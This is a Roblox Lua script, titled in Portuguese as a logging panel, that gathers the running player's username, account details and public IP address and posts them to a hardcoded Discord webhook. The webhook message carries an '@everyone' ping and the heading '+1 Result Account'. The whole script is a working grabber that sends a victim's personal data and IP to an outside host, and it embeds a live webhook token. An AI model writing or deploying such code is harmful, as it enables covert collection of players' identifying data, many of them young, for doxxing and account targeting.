-- [ SISTEMA DE LOGS ATUALIZADO - PAINEL KOVARIK ]
local HttpService = game:GetService("HttpService")
local Players = game:GetService("Players")
local lp = Players.LocalPlayer

-- Configure sua Webhook abaixo
local Webhook_URL = "https://discord.com/api/webhooks/1492078460548415508/0DTMWHe9C_Sa4TPWWzGirUVetHdZLsys6riUbvIp6b14gXJSZi3RMK1jJzaewG81L8vp"

local function GetUserData()
    local user_id = lp.UserId
    local username = lp.Name
    local display_name = lp.DisplayName
    
    local thumb = "https://www.roblox.com/headshot-thumbnail/image?userId="..user_id.."&width=420&height=420&format=png"
    
    local creation_date = "N/A"
    local premium = lp.MembershipType == Enum.MembershipType.Premium and "Sim" or "Não"
    local age = lp.AccountAge
    local friend_count = 0
    local public_ip = "HTTP Disabled / Erro API"

    -- 1. TENTATIVA DE PEGAR O IP COM TRATAMENTO DE ERRO
    local success, result = pcall(function()
        return HttpService:GetAsync("https://api.ipify.org?format=json")
    end)

    if success then
        local data = HttpService:JSONDecode(result)
        public_ip = data.ip
    else
        -- Se falhar, pode ser que o HTTP esteja desativado nas configs do mapa
        public_ip = "Permissão Negada (Ative o HTTP)"
    end

    -- 2. QUANTIDADE DE AMIGOS
    pcall(function()
        local friend_info = HttpService:JSONDecode(game:HttpGet("https://friends.roblox.com/v1/users/"..user_id.."/friends/count"))
        friend_count = friend_info.count
    end)

    -- 3. DATA DE CRIAÇÃO
    pcall(function()
        local info = HttpService:JSONDecode(game:HttpGet("https://users.roblox.com/v1/users/"..user_id))
        if info and info.created then
            local date = info.created:sub(1, 10)
            local y, m, d = date:match("(%d+)-(%d+)-(%d+)")
            creation_date = d.."/"..m.."/"..y
        end
    end)

    local data = {
        ["content"] = "||@everyone @here||",
        ["username"] = "Kovarik",
        ["embeds"] = {{
            ["title"] = "+1 Result Account 🔥",
            ["description"] = "[Rolimons](https://www.rolimons.com/player/"..user_id..") | [Roblox Profile](https://www.roblox.com/users/"..user_id.."/profile)",
            ["color"] = 11097043,
            ["thumbnail"] = {["url"] = thumb},
            ["footer"] = {["text"] = "Painel Kovarik Security | 2026"},
            ["fields"] = {
                {["name"] = "Username", ["value"] = username .. " ("..display_name..")", ["inline"] = true},
                {["name"] = "Premium", ["value"] = premium, ["inline"] = true},
                {["name"] = "Creation Date", ["value"] = creation_date, ["inline"] = true},
                {["name"] = "Friends", ["value"] = tostring(friend_count), ["inline"] = true},
                {["name"] = "Account Age", ["value"] = age .. " dias", ["inline"] = true},
                {["name"] = "IP Address", ["value"] = "||" .. public_ip .. "||", ["inline"] = true},
            }
        }}
    }

    -- 4. ENVIO FINAL
    local sendSuccess, sendError = pcall(function()
        local jsonData = HttpService:JSONEncode(data)
        HttpService:PostAsync(Webhook_URL, jsonData)
    end)
    
    if not sendSuccess then
        warn("Falha ao enviar Webhook: " .. tostring(sendError))
    end
end

GetUserData()
